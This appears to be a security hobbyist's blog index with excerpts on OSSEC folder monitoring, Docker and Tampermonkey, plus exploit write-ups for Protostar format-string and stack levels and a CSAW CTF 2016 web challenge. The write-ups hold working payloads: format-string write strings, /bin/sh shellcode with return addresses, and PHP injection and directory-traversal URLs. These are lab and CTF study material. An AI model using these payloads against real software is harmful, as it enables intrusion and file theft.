Posts

Experience in folder monitoring with OSSEC

Image
Today i had some job relate to folder monitoring. In my solution, i have selected OSSEC with ELK. I have spent 5 hour to troubleshooting OSSEC. :)). This it first time i config it.
You can use syscheck to folder monitoring. Reference in: http://ossec-docs.readthedocs.io/en/latest/faq/syscheck.html and http://ossec-docs.readthedocs.io/en/latest/manual/syscheck/
To monitor file edit, delete you can use syscheck with realtime monitor.
But to monitor  file added, you need:
Add to local_rule.xml
Edit ossec.conf:

Main problem is: you must edit ossec.conf in server (in my case is wazuh), not windows client.  Second problem, after integrity change more than 3 times, ossec disable alert. You must add auto_ignore is no in syscheck (on server). This is my result: ----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued -…

Exploit Exercises - Format String

Format1:
Padding to last mem dump
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%x
Write
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%n
DMA
/opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'`
Format2 need write value to address:
POC:
python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo
|Address|Value|Padding|%n

DMA
python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"'  |  /opt/protostar/bin/format2

Format3: write 4 byte with speacify address: POC: python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\x08"+"%x&qu…

Exploit Exercises - Protostar Stack 7

In this level, app check return address not start with 0xbxxxxxxx. So i pop pop ret to load return address to stack, and call it.
Found pop pop ret at: 0x08048492
This payload:
| "A" * 80 | address | 8 bytes junk | | NOP to bit shifing | Shell code |
This is shell code:
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
Load poc to gdb, debug, break point, etc... I found nop shell start at: 0xbffff698. Ok build poc:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "…

Exploit Exercises - Protostar Stack 6

It is free time - I had some time to play exploit-exercises. Today i play at stack level 6. I learned some experience for me, with return to lib.
Use gdb, disassembly:
#gdb -q /opt/protostar/bin/stack6  (gdb) disas main
Dump of assembler code for function main:
0x080484fa :    push   %ebp
0x080484fb :    mov    %esp,%ebp
0x080484fd :    and    $0xfffffff0,%esp
0x08048500 :    call   0x8048484
0x08048505 :   mov    %ebp,%esp
0x08048507 :   pop    %ebp
0x08048508 :   ret  
End of assembler dump.  (gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484 : push   %ebp
0x08048485 : mov    %esp,%ebp
0x08048487 : sub    $0x68,%esp
0x0804848a : mov    $0x80485d0,%eax
0x0804848f :        mov    %eax,(%esp)
0x08048492 :        call   0x80483c0
0x08048497 :        mov    0x8049720,%eax
0x0804849c :        mov    %eax,(%esp)
0x0804849f :        call   0x80483b0
0x080484a4 :        lea    -0x4c(%ebp),%eax
0x080484a7 :        mov    %eax,(%esp)
0x080484aa :        call   0x8048380
0x080484af :…

Some experience when use Docker

In this week, my job is set up ELK with Suricata. I choose docker is platform to run all. Now, i had some experience about docker.
Use docker-compose. It is very good deployment for production, build && run.
Install docker-compose via pip.
Use build image to create your custom start-up distro.
I used docker compose version 2 syntax, notice different with version, like network and net
Use network --net if you need monitor, or use all card
You can not use cd command, must use WORKDIR. Read Dockerfile document very carefully.
Use links, when use it, it run links container before. You can run manual, and start main container after. Must sure it started.
In docker command, must use command to hold tty, like: suricata -c xxx or python manager server 0.0.0.0:8080
----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be conti…

Tampermonkey HelloWorld and create menuCommand

Image
Today, i need write one script with tampermonkey. It is very hard :(.
To write helloworld. Create new script.
Edit config: Add
// @connect      *
// @match        http://*/*
// @match        https://*/*
You can edit author, homepage, etc..
Add your code in main code in comment. I used console.log()
 This is result:
I need create button in menu, so i used:
Edit config, remove grant none and add: // @grant        GM_registerMenuCommand

You will see new menu button in tamper monkey.
----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

[Writeup] CSAW CTF 2016

Image
mfw (125)
This main url:
http://web.chal.csaw.io:8000

Fuzz it to easy:
http://web.chal.csaw.io:8000/?page=about%27.phpinfo%28%29.%27

Play with flag
http://web.chal.csaw.io:8000/?page=about%27.system%28%22cat%20templates/flag.php%22%29.%27
flag{3vald_@ss3rt_1s_best_a$$ert}


wtf.sh 1 (150)

http://web.chal.csaw.io:8001
Register one account, logined.
Create post, view post
Fuzzing now, i found directory traversal (WTF? traversal again)
When fuzz to: http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../ I found some source code. I guess may be can read all file in this directoty, like cat * :)).

I found some interesting function (after use decoder to view beautifull code):

function hash_password {
    local password=$1;
    (shasum <<< ${password}) | cut -d\  -f1;
}
# hash usernames for lookup in the users_lookup table
function hash_username {
    local username=$1;
    (shasum <<< ${username}) | cut -d\  -f1;
}
# generate a random token, base64 encoded
# on GNU base64 wraps at 76 …